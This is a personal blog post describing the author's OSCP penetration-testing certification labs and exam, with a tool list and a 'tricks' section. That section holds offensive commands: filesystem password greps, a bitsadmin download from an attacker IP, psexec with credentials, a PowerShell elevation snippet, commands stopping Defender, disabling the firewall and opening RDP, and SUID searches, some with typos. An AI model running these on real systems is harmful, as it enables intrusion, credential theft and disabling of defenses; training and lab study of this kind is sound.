31 days of OSCP Experience

Posted on 17 Apr 2018 by Paranoid Ninja


Hi folks. I completed my OSCP exam in the first attempt last year in October. To say the exam wasn’t as hard as I was expecting it to be. The exam started at 13:30 p.m. on 23rd October and all the machines were pawned by 19:30 the same day. The next two hours I spent on building a fully customised report and sent the report then and there. So the whole exam of 24 hrs plus report of another 24 hours was all done in around a total of 8 hours. I received a mail from Offsec in the next two days stating I had cleared the exam.

This is however what happened during my exam. A lot of people who know me were asking me why I found the exam to be easy. I am not a pro nowhere near an elite. It’s just that I tried harder. So, let me take you through how it all started and what all preparations I did before going in for the exam.

P.S.: I never used the kali virtual machine that was given by Offsec. I used my own custom Debian 9-Stretch distro with custom tools which I used throughout the labs as well as exam.


The Prologue

I came back home from an overseas project of Threat hunting in July 2017 and saw two of my friends had already registered for the OSCP course. Thinking why not, I registered myself on 6th August for a two-month lab. My labs were scheduled to start on 10th of September. I had no projects for a month except the daily office routine of 9 hours. My friend’s lab had already started and looking at him solving them I started shitting bricks; reason being because I was never really good in WebApp sec. So, I knew I would have to study hard for it. I started solving VMs from VulnHub and HTB (HackTheBox).

With sleepless nights passing by, by 5th of September, I had already solved a total of around 70+ CTFs/Machines. I already had a decent knowledge regarding python, ruby, C and C++; so I wasn’t really worried about exploit modifications. My sole problem was WepAppSec. ‘Coz I knew once I am in, privilege escalation has always been easy for me. The next 4 days from 6th to 9th September, I spent on reading up on assembly and buffer overflow videos from Pentester Academy (Vivek Ramachandran). Trust me when I say I never did exploit development before this and they helped a lot. His videos are awesome.


Main()

So this is 10th of September i.e. Sunday and my labs started at 6:00 A.M. in the morning. I connected to the Offsec’s VPN, and I knew that all I will be getting are just IPs and everything else depends on what I do from there. I ran a quick Nmap scan and from the few hostnames that I found, I was able to identify I am in a domain environment. So, I quickly wrote a bash script to perform DNS lookup on loop to get all existing IPs and possible hostnames from the AD DC. You can find the script here. Once I found the basic details of all the systems, I tried to crack the first machine and it was done in around 15-20 minutes or so. I tried the next and so on in a numerically ascending order of the IPs that I had discovered and was able to crack four machines on the first day. My confidence shot sky high that day. I hadn’t used Metasploit for a single machine till now.

So, I made myself a few commitments:

  1. Try avoiding Metasploit at all costs. Neither exploits nor meterpreter shells. (However I had to use them at few places where I needed to use shellcode or needed to quickly migrate my1. shell from an unstable exploit/process)
  2. Only use msfvenom for building shellcode.
  3. Use netcat for reverse shells.
  4. Solve atleast 3 machines in a day. By doing this, I should be able to complete all my lab machines in 30 days max.

I had my office hours from 9:00 to 18:00 which is 50km away from my house. Travelling takes around 2 hours. So, calculating all that I used to wake up at 5:00 with a target to solve atleast one machine till 6:30, freshen up and then leave for office. Once, I am back from office by 19:30, my aim was to solve atleast two machines by 24:00. Some days 2 machines, some days 3, in this manner I was able to solve the first 35 machines by 25th of September. Sundays were a home lockdown for me and was able to pawn a lot on these days. I used the below tools and techniques as far as I remember to exploit most of the machines:

  1. Nmap, Netcat for port scanning and testing vulnerabilities
  2. Dirbuster, Gobuster, Nikto and Burpsuite for Web application scanning
  3. Tcpdump, Wireshark for sniffing traffic
  4. Python HTTP Servers to serve RFI php shells.
  5. Mimikatz, pwdump, fgdump, pwdump and procmon for password dumping and pass the hash/golden ticket attacks
  6. Cuda Hashcat for password cracking (Nvidia graphics card)
  7. Iptables, proxychains and sshuttle for routing hops
  8. Medusa, Hydra for Http login form bruteforcing
  9. Grep, sed, awk, sort, uniq, find, findstr, cut for finding passwords and sensitive files during privilege escalation and post exploitation recon
  10. Snmpenum, enum4linux, nullinux, smbmap for smb and snmp enumeration
  11. Powershell scripts and bitsadmin(built-in windows tool) to download files (highly recommended if you are not using meterpreter shell)
  12. Sendemail, Python Servers for social engineering (yes, you will have to perform SE on automated bot systems for client side attacks)
  13. Accesscheck.exe from sysinternals and Ntrights.exe, Churrasco.exe to find access misconfigurations
  14. Psexec for lateral movements and remote shells
  15. Cadaver and davtest for windows asp based web server to test read/write access

I used a lot of one liner reverse shells of perl, python, bash, socat and awk from pentestmonkey for quick tcp reverse shells.


Other tricks

Post Exploit Enumeration

    grep -rnw '/' -ie 'pass' --color=always
    grep -rnw '/' -ie 'DB_PASS' --color=always
    grep -rnw '/' -ie 'DB_PASSWORD' --color=always
    grep -rnw '/' -ie 'DB_USER' --color=always

File Upload on linux systems via base64 encoding

Converting a file to base64:

cat file2upload | base64

Once the file is converted to base64, you can just create a new file on the remote system and copy the base64 output of the above file into it. Next step would be to reverse the base64 to binary

cat fileWithBase64Content | base64 -d > finalBinary

You can also use the smbserver.py from Impacket’s repo to host a temporary smb server and fetch files in windows from remote smb servers using the net use command.

PSexec Shells of Remote Systems

.\psexec64.exe \\192.168.x.x -u .\administrator -p admin@123 cmd.exe

Eg: Get cmd.exe shell of remote system with user administrator and password as admin@123

Powershell Sudo for Windows

There maybe times when you know the creds to admin, but will have a low privileged shell. Unlike Linux, we cannot sudo on windows machines. So, I wrote a simple powershell script for that which can run a separate file as admin. You can run a batch file to add a new superuser or just execute a meterpreter binary as admin. The below command is to be run in a powershell window:

    $pw= convertto-securestring "EnterPasswordHere" -asplaintext -force
    $pp = new-object -typename System.Management.Automation.PSCredential -argumentlist "EnterDomainName\EnterUserName",$pw
    $script = "C:\Users\EnterUserName\AppData\Local\Temp\test.bat"
    Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{Start-Process $script -verb Runas}'

If however you want to run the powershell from a cmd prompt, you can run store the above command in a xyz.ps1 file and run it in cmd as below:

powershell -ExecutionPolicy Bypass -File xyz.ps1

Download files in Windows with bitsadmin

bitsadmin /transfer mydownloadjob /download /priority normal http://<attackerIP>/xyz.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\xyz.exe

Disable firewall/defender and enable RDP for all

Sometimes you will have the admin creds and may require an RDP Session to find out what exactly is going on in the backend for post exploitation. Below commands will help you disable firewall and enable RDP over insecure connections

    sc stop WinDefend
    netsh advfirewall show allprofiles
    netsh advfirewall set allprofiles state off
    netsh firewall set opmode disable
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
grep -rnw '/' -ie 'password' --color=always

Find files with SUID permission

find / -perm -4000 -type f 2>/dev/null

Find files with open permissions

find / -perm -777 -type f 2>/dev/null

Find files with SUID permission for current user

    find / perm /u=s -user `whoami` 2>/dev/null
    find / -user root -perm -4000 -print 2>/dev/null

Find files with writable permission for current user or current group

    find / perm /u=w -user `whoami` 2>/dev/null
    find / -perm /u+w,g+w -f -user `whoami` 2>/dev/null
    find / -perm /u+w -user `whoami` 2>/dev/nul

Find directories with writable permissions for current user or current group

    find / perm /u=w -type -d -user `whoami` 2>/dev/null
    find / -perm /u+w,g+w -d -user `whoami` 2>/dev/null

If you are not going to use meterpreter, then using tools from Sysinternals toolkit from Microsoft can be a lot of help. I used it to dump passwords from memory using procmon and psexec to laterally move through the domain network and pawn the ADDC. There are also other tools like netmon.exe and smb analysis tools which can help you identify which machine is communicating with which system.

The most hard machines that I had heard about before starting OSCP were Pain, Ghost, Humble and Sufference. However, none of these were that hardest machines for me. The hardest machine for me was in a totally different network with the name JACK. Pain was done in around 6 hours, Ghost and Sufference in around 3-4 hours each. Humble made me pull my hair. It was an awesome machine with a mix of multiple exploits combined together. I started solving this machine at 12.00 a.m. at night, and finally found a way in at 4.30 in the morning. I thought that since the entry point was hard, the privilege escalation would be easy, but boy I was wrong. It took me another 4 hours to get the privilege escalated. From 12.00 at night to 9.00 in the morning and finally this machine was done.

Now comes the hard part. I found out there is more than one network in the labs, all segregated. I tried to exploit them, but was unable to pawn any. Upon looking closely, I found there are dependencies of other machines as well. In short, machines in other networks, as well as the current network are all corelated. This is when I realised something:

Exploitation of a system is not hard. But It’s the POST EXPLOITATION skills which can make you go crazy…

Most people I’ve known or seen tend to solve only the first 30 machines of the labs, then give the exams and then fail. The reason for failure being, the main lab starts after the first 39 machines. When you hop on to the other networks, find dependencies of machines like in a real domain network, do custom routing manually, use iptables, modify windows firewall rules, setup proxychains and cross network scanning via sshuttle. This is when you lose your shit. I had to go back to all those 35 machines that I had solved and started running my post exploitation script on all of them. You can find the Linux recon script I wrote in bash here. It’s useful for privilege escalation as well as finding passwords of other users, misconfigured directories and so on. For windows, I was manually traversing the directories and browsing files, or was using the findstr command to find sensitive files.

So, its 5th of October and most machines were pawned till now. Performing a scan, I realised there is one last network pending with 3 machines in it. And man, this network was crazy. In the OSCP VPN lab, you can see when a machine was reverted or was tried to pawn by someone else. Most machines were reverted with a backlog of max 2 days. But holyshit. The machines in this network weren’t even touched since past 54 freakin’ days. This was a ghost town and I had to hop multiple networks to get here. The connection was slow as shite and performing a slow nmap scan took hours. Finally I was able to pawn two machines from there. 54 machines done, 28 days over. I still had 33 days to go and one last machine standing infront of me. This was the mighty JACK. Scary as hell and nothing to be found. I consulted the Offsec admin, and they said “Look whats infront of you”. This made me remember a dialogue from Mr. Robot.

“You can only see whats infront of you and not what’s above you”

It took me two days and I had nothing. Before I go crazy, I thought of consulting my friend who had already completed that machine, and he gave me a small hint. I then realised what Offsec admin said. Everything was exactly infront of me. I just ignored it thinking it can’t be that stupid and it was that itself. It was a big facepalm. Finally on the 31st day I solved that machine and all my lab machines were completed (including a hidden secret machine which is super dependent).

I decided to just take a rest for a few days away from computer, prepare my notes of whatever I found and finally scheduled the exam for 23rd October.


Final Exam:

I was informed by Offsec about the minimum marks required to clear the exam. And I was not going to submit my Lab report which meant I had to solve almost all the machines to clear the exam.

Exam started at 13:00. I completed the First machine with the highest points in around 20 minutes. It was pretty easy. I got stuck in the Second machine with the lowest points for 1.5 hours. Scared me, I decided to skip that machine. I solved 2 more machines in 30 minutes each. The last machine with highest marks was literally damn confusing but was able to pawn it in 1.5 hour or so. So I had all the points now required to clear the exam and still 19.5 hours to solve the second machine which I had left with the lowest points. Staring at whatever I had collected from that machine for 1 hour, I found out that the answer was right infront of me. I tried a manual exploit and BAMN! I was root.

I didn’t have to use Metasploit or meterpreter for a single machine however. I finally built the report and sent it by 21:00 and got a notification two days later that I had cleared the exam.

Epilogue

The final thing I would say to people is that the exam doesn’t matter. It’s the labs which actually make you learn every damn thing. If you don’t solve atleast top 45-50 machines in the lab, then you literally wasted your lab money. OSCP is not an exam and atleast not something that should be done to increase your value in the market. OSCP is a journey, and only tastes better when you are frustrated and finally find the answer yourself.

This was a long post I know, but I wanted to share all my knowledge that I had received during my exam. If you have any questions, do post them in the comments below.